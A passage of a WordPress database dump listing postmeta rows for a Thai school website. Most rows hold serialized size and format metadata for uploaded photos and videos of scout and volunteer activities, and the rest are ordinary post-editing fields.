(796,262,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/07/S__68788233_0.jpg\";s:8:\"filesize\";i:577771;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__68788233_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19611;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__68788233_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:149563;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__68788233_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9530;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__68788233_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:92674;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__68788233_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:284572;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__68788233_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24556;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(797,263,'_wp_attached_file','2024/07/S__68788234_0.jpg'),
(798,263,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/07/S__68788234_0.jpg\";s:8:\"filesize\";i:423312;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__68788234_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15842;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__68788234_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:118085;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__68788234_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7345;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__68788234_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73789;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__68788234_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:221077;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__68788234_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19652;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(799,264,'_wp_attached_file','2024/07/S__68788235_0.jpg'),
(800,264,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/07/S__68788235_0.jpg\";s:8:\"filesize\";i:374124;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__68788235_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15632;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__68788235_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:106456;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__68788235_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7599;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__68788235_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67959;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__68788235_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:196721;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__68788235_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19523;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(801,265,'_wp_attached_file','2024/07/S__68788236_0.jpg'),
(802,265,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/07/S__68788236_0.jpg\";s:8:\"filesize\";i:471706;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__68788236_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16082;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__68788236_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:129529;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__68788236_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7832;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__68788236_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80302;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__68788236_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:245428;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__68788236_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20898;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(803,266,'_wp_attached_file','2024/07/S__68788237_0.jpg'),
(804,266,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/07/S__68788237_0.jpg\";s:8:\"filesize\";i:484590;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__68788237_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15878;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__68788237_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:130585;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__68788237_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7740;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__68788237_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80094;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__68788237_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:249968;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__68788237_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20659;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(805,267,'_wp_attached_file','2024/07/28-67.png'),
(806,267,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:17:\"2024/07/28-67.png\";s:8:\"filesize\";i:4567672;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"28-67-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:132536;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"28-67-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1231206;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"28-67-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:49483;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"28-67-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1365272;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"28-67-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2463307;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:17:\"28-67-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:119851;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(808,245,'_edit_last','1'),
(809,245,'title_style','default'),
(810,245,'_title_style','field_5d1a0217cf408'),
(811,245,'related',''),
(812,245,'_related','field_603b51c3e183e'),
(813,268,'title_style','default'),
(814,268,'_title_style','field_5d1a0217cf408'),
(815,268,'related',''),
(816,268,'_related','field_603b51c3e183e'),
(818,245,'_thumbnail_id','247'),
(821,269,'title_style','default'),
(822,269,'_title_style','field_5d1a0217cf408'),
(823,269,'related',''),
(824,269,'_related','field_603b51c3e183e'),
(826,206,'related',''),
(827,206,'_related','field_603b51c3e183e'),
(828,208,'related',''),
(829,208,'_related','field_603b51c3e183e'),
(831,271,'title_style','default'),
(832,271,'_title_style','field_5d1a0217cf408'),
(839,274,'title_style','default'),
(840,274,'_title_style','field_5d1a0217cf408'),
(841,275,'_edit_lock','1722437609:1'),
(842,276,'_wp_attached_file','2024/07/welcome3.mp4'),
(843,276,'_wp_attachment_metadata','a:10:{s:7:\"bitrate\";i:478919;s:8:\"filesize\";i:3045079;s:9:\"mime_type\";s:15:\"video/quicktime\";s:6:\"length\";i:51;s:16:\"length_formatted\";s:4:\"0:51\";s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:10:\"fileformat\";s:3:\"mp4\";s:10:\"dataformat\";s:9:\"quicktime\";s:17:\"created_timestamp\";i:-2082844800;}'),
(845,275,'_edit_last','1'),
(846,275,'title_style','default'),
(847,275,'_title_style','field_5d1a0217cf408'),
(848,277,'title_style','default'),
(849,277,'_title_style','field_5d1a0217cf408'),
(850,275,'related',''),
(851,275,'_related','field_603b51c3e183e'),
(852,277,'related',''),
(853,277,'_related','field_603b51c3e183e'),
(855,278,'_wp_attached_file','2024/07/สวนสนาม.mp4'),
(856,278,'_wp_attachment_metadata','a:11:{s:7:\"bitrate\";i:320423;s:8:\"filesize\";i:7493790;s:9:\"mime_type\";s:9:\"video/mp4\";s:6:\"length\";i:161;s:16:\"length_formatted\";s:4:\"2:41\";s:5:\"width\";i:640;s:6:\"height\";i:360;s:10:\"fileformat\";s:3:\"mp4\";s:10:\"dataformat\";s:9:\"quicktime\";s:5:\"audio\";a:9:{s:10:\"dataformat\";s:3:\"mp4\";s:7:\"bitrate\";i:48020;s:5:\"codec\";s:19:\"ISO/IEC 14496-3 AAC\";s:11:\"sample_rate\";d:44100;s:8:\"channels\";i:2;s:15:\"bits_per_sample\";i:16;s:8:\"lossless\";b:0;s:11:\"channelmode\";s:6:\"stereo\";s:17:\"compression_ratio\";d:0.034027777777777775;}s:17:\"created_timestamp\";i:-2082844800;}'),
(858,280,'_wp_attached_file','2024/07/LINE_ALBUM_ลูกเสือ_240701_87.jpg'),
(859,280,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:54:\"2024/07/LINE_ALBUM_ลูกเสือ_240701_87.jpg\";s:8:\"filesize\";i:666793;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_ลูกเสือ_240701_87-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20303;}s:5:\"large\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_ลูกเสือ_240701_87-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:191022;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_ลูกเสือ_240701_87-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10146;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_ลูกเสือ_240701_87-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:113715;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_ลูกเสือ_240701_87-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:375168;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_ลูกเสือ_240701_87-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26649;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(861,275,'_thumbnail_id','317'),
(862,275,'enclosure','http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/สวนสนาม.mp4\n7493790\nvideo/mp4\n'),
(864,281,'title_style','default'),
(865,281,'_title_style','field_5d1a0217cf408'),
(866,281,'related',''),
(867,281,'_related','field_603b51c3e183e'),
(868,282,'_wp_attached_file','2024/07/Screenshot-2024-07-30-111731.jpg'),
(869,282,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1122;s:6:\"height\";i:627;s:4:\"file\";s:40:\"2024/07/Screenshot-2024-07-30-111731.jpg\";s:8:\"filesize\";i:115773;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:40:\"Screenshot-2024-07-30-111731-300x168.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13306;}s:5:\"large\";a:5:{s:4:\"file\";s:41:\"Screenshot-2024-07-30-111731-1024x572.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:572;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:76201;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:40:\"Screenshot-2024-07-30-111731-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6973;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:40:\"Screenshot-2024-07-30-111731-768x429.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:429;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:50853;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:40:\"Screenshot-2024-07-30-111731-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17462;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(877,285,'_edit_lock','1722437532:1'),
(878,286,'_wp_attached_file','2024/07/จิตอาสา.mp4'),
(879,286,'_wp_attachment_metadata','a:11:{s:7:\"bitrate\";i:402975;s:8:\"filesize\";i:7327382;s:9:\"mime_type\";s:9:\"video/mp4\";s:6:\"length\";i:129;s:16:\"length_formatted\";s:4:\"2:09\";s:5:\"width\";i:640;s:6:\"height\";i:360;s:10:\"fileformat\";s:3:\"mp4\";s:10:\"dataformat\";s:9:\"quicktime\";s:5:\"audio\";a:9:{s:10:\"dataformat\";s:3:\"mp4\";s:7:\"bitrate\";i:48016;s:5:\"codec\";s:19:\"ISO/IEC 14496-3 AAC\";s:11:\"sample_rate\";d:44100;s:8:\"channels\";i:2;s:15:\"bits_per_sample\";i:16;s:8:\"lossless\";b:0;s:11:\"channelmode\";s:6:\"stereo\";s:17:\"compression_ratio\";d:0.0340249433106576;}s:17:\"created_timestamp\";i:-2082844800;}'),
(880,287,'_wp_attached_file','2024/07/Screenshot-2024-07-30-112049.jpg'),
(881,287,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1135;s:6:\"height\";i:610;s:4:\"file\";s:40:\"2024/07/Screenshot-2024-07-30-112049.jpg\";s:8:\"filesize\";i:191314;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:40:\"Screenshot-2024-07-30-112049-300x161.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:161;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12219;}s:5:\"large\";a:5:{s:4:\"file\";s:41:\"Screenshot-2024-07-30-112049-1024x550.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:114658;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:40:\"Screenshot-2024-07-30-112049-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6021;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:40:\"Screenshot-2024-07-30-112049-768x413.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:413;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:71153;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:40:\"Screenshot-2024-07-30-112049-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16432;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(882,288,'_wp_attached_file','2024/07/Screenshot-2024-07-30-112145.jpg'),
(883,288,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1131;s:6:\"height\";i:609;s:4:\"file\";s:40:\"2024/07/Screenshot-2024-07-30-112145.jpg\";s:8:\"filesize\";i:171541;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:40:\"Screenshot-2024-07-30-112145-300x162.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:162;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17823;}s:5:\"large\";a:5:{s:4:\"file\";s:41:\"Screenshot-2024-07-30-112145-1024x551.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:551;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:107825;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:40:\"Screenshot-2024-07-30-112145-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8422;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:40:\"Screenshot-2024-07-30-112145-768x414.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:414;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:72297;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:40:\"Screenshot-2024-07-30-112145-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22462;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(885,285,'_thumbnail_id','316'),
(886,285,'enclosure','http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/จิตอาสา.mp4\n7327382\nvideo/mp4\n'),
(887,285,'_edit_last','1'),
(889,285,'title_style','default'),
(890,285,'_title_style','field_5d1a0217cf408'),
(891,285,'related',''),
(892,285,'_related','field_603b51c3e183e'),
(893,289,'title_style','default'),
(894,289,'_title_style','field_5d1a0217cf408'),
(895,289,'related',''),
(896,289,'_related','field_603b51c3e183e'),
(899,290,'title_style','default'),
(900,290,'_title_style','field_5d1a0217cf408'),
(901,290,'related',''),
(902,290,'_related','field_603b51c3e183e'),
(904,292,'_edit_lock','1722437704:1'),
(905,293,'_wp_attached_file','2024/07/441527005_441923068779713_3712436577410634971_n.mp4'),
(906,293,'_wp_attachment_metadata','a:11:{s:7:\"bitrate\";i:171293;s:8:\"filesize\";i:5300766;s:9:\"mime_type\";s:9:\"video/mp4\";s:6:\"length\";i:189;s:16:\"length_formatted\";s:4:\"3:09\";s:5:\"width\";i:480;s:6:\"height\";i:270;s:10:\"fileformat\";s:3:\"mp4\";s:10:\"dataformat\";s:9:\"quicktime\";s:5:\"audio\";a:9:{s:10:\"dataformat\";s:3:\"mp4\";s:7:\"bitrate\";i:48019;s:5:\"codec\";s:19:\"ISO/IEC 14496-3 AAC\";s:11:\"sample_rate\";d:44100;s:8:\"channels\";i:2;s:15:\"bits_per_sample\";i:16;s:8:\"lossless\";b:0;s:11:\"channelmode\";s:6:\"stereo\";s:17:\"compression_ratio\";d:0.03402706916099773;}s:17:\"created_timestamp\";i:-2082844800;}'),
(907,294,'_wp_attached_file','2024/07/Screenshot-2024-07-30-112901.jpg'),
(908,294,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1128;s:6:\"height\";i:622;s:4:\"file\";s:40:\"2024/07/Screenshot-2024-07-30-112901.jpg\";s:8:\"filesize\";i:133146;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:40:\"Screenshot-2024-07-30-112901-300x165.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:165;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15267;}s:5:\"large\";a:5:{s:4:\"file\";s:41:\"Screenshot-2024-07-30-112901-1024x565.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:565;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:85321;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:40:\"Screenshot-2024-07-30-112901-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8670;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:40:\"Screenshot-2024-07-30-112901-768x423.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:423;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56982;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:40:\"Screenshot-2024-07-30-112901-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19423;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(910,292,'_thumbnail_id','318'),
(911,292,'enclosure','http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/441527005_441923068779713_3712436577410634971_n.mp4\n5300766\nvideo/mp4\n'),
(912,292,'_edit_last','1'),
(914,292,'title_style','default'),
(915,292,'_title_style','field_5d1a0217cf408'),
(916,295,'title_style','default'),
(917,295,'_title_style','field_5d1a0217cf408'),
